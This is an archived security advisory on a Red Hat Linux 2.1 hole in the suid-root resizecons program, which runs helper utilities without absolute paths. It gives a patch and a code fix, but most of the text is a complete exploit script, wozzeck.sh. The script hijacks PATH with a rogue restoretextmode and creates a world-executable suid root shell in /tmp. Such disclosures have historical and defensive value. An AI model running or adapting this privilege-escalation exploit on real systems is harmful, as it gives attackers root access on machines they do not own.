TUCoPS :: Linux :: Red Hat/Fedora :: linux_wo.txt

Red Hat Linux 2.1 /usr/bin/resizecons security hole


   There is a security hole in RedHat 2.1, which installs the program
/usr/bin/resizecons suid root.  The resizecons program allows a user
to change the videmode of the console.  During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges.  It then executes setfont in the same manner.  By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.
   As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles
SIGWINCH calls) on the machine.
   If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
before opening.

                   Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
              Requirements: account on system
           Temporary Patch: chmod -s /usr/bin/resizecons
       Security Compromise: root
                    Author: Dave M. (davem@cmu.edu)
                  Synopsis: resizecons runs restoretextmode without an
                            absolute pathname while executing as root,
                            allowing a user to substitute the real
                            program with arbitrary commands.

Exploit:

wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz.  Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi






TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH